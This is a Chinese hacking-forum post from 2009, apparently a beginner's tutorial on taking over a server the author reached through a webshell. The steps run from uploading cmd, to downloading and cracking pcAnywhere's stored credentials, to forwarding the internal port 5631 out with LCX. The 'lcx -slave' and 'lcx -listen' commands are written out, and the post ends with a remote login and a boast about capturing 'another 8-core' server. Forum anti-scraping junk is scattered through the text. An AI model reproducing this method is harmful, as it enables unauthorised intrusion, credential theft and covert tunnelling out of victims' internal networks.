|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
. _, v2 z, V' W9 d2 d# h, \3 ^0 @( b& t# V5 d
提权方法:pcanywhere+LCX
' N/ J- l- m6 ^' D( P1 D1 }2 Z( C7 u- T# z! M
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。3 I; P- q+ ^) m7 z6 U f
, y, {+ v% r8 ?" F
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。% Q2 D1 d' G4 s2 W0 }( b5 r
+ f2 K# s0 i" k: _( X) V! F( D$ i' F; a: L
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。% v% f1 I A, @8 }8 o4 F. ^0 q
2 J0 L; _# l0 s2 W; F7 g. {* ~" u6 x
4 i( Y& }: @, Y- @1 z9 ^9 e呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。5 o" V* m* P$ ]3 t6 A. E' ?
! D& |' n6 E, B& P# N: g, J
4 @ C, h/ {4 [4 h- L) X U- \" n3 y2 `# |
3 u% w1 Y r0 H% N/ W( x由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``+ [4 L* [+ w2 ~6 |1 c, ^& }
4 H/ l& o$ c! L
* }1 i. [: _+ `# Y# g% M+ yLCX的用法再简单说下:
( D: r" g. A$ a x6 s5 H& ~
# |# r: h0 {% Z( q. @服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)2 D% V5 d) L! s8 E
. J4 P1 H: p" G2 f4 @
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)# m; N7 {5 a& Q- K: n8 `
: C \/ ^) W. d. k1 T
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。4 Z/ b/ P7 V" d6 f2 W- {5 W
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
8 V+ q! {4 L& a! D2 m7 o2 Z6 a% C3 J# h) U
! c( _6 c7 v) q* m+ ~
+ J( I: s, K# @, `1 }. M- [/ f- E% D3 h* J# F5 s
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。1 Q8 T v: D; [! ~# W) k8 a+ C
' A! n/ z4 Y3 b, V; [$ k
* I {. D) l7 G! h: e: `% j7 V# ?9 c3 r t& ?7 W
% R: p: [' l' Q( v5 u
我们本地连接试试,输入我们刚破解的账号密码
. p+ u ]5 B0 q M- c) p ?5 ~% n$ q) | T/ }, \
" j" L% ^, `2 P5 V6 t( A
呵呵``连接成功,服务器不错,又一个8核^︵^
# Y! f6 j8 o! `. }6 E6 v1 I6 d
' e9 a! H8 X5 r# T: s) R# ]
# C& l, b4 i& ]$ P" m6 | X; ]6 C/ [9 G6 z( G
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
